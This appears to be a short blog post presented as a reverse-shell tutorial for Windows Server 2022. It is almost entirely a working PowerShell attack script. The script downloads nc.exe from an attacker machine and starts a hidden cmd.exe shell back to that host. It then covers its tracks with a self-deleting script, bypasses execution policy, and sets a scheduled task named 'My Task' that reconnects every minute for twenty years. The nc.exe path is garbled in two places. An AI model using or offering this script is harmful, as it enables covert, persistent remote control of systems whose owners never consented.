Learn about reverse shells, a vital technique for penetration testing and ethical hacking. This post covers how to set up and execute a reverse shell using PowerShell on Windows Server 2022 and Task Scheduler. Ensure responsible and legal deployment to enhance network security. [Educational Purposes only]
Here is the script (change the ip to your Kali machine IP):
Define variables
$ncUrl = "10.0.0.1:8000/nc.exe"
$ncPath = "C:\Windows\Temp
c.exe"
$ncCommand = "$ncPath -e cmd.exe 10.0.0.1 8080"
Download nc.exe
Invoke-WebRequest -Uri $ncUrl -OutFile $ncPath
Create a PowerShell script to run nc.exe and delete itself
$scriptPath = "C:\Windows\Temp\RunAndDelete.ps1"
$scriptContent = @"
Start-Process -FilePath $ncPath -ArgumentList '-e cmd.exe 10.0.0.1 8080' -WindowStyle Hidden
Remove-Item -Path '$scriptPath' -Force
"@
$scriptContent | Set-Content -Path $scriptPath
Run the script
Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File $scriptPath" -WindowStyle Hidden
$action=New-ScheduledTaskAction -Execute 'Powershell.exe' -Argument 'C:\Windows\Temp
c.exe -e cmd.exe 10.0.0.1 8080'
$trigger = New-ScheduledTaskTrigger `
-Once `
-At (Get-Date) `
-RepetitionInterval (New-TimeSpan -Minutes 01) `
-RepetitionDuration (New-TimeSpan -Days (365 * 20))
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "My Task" -Description "My Task"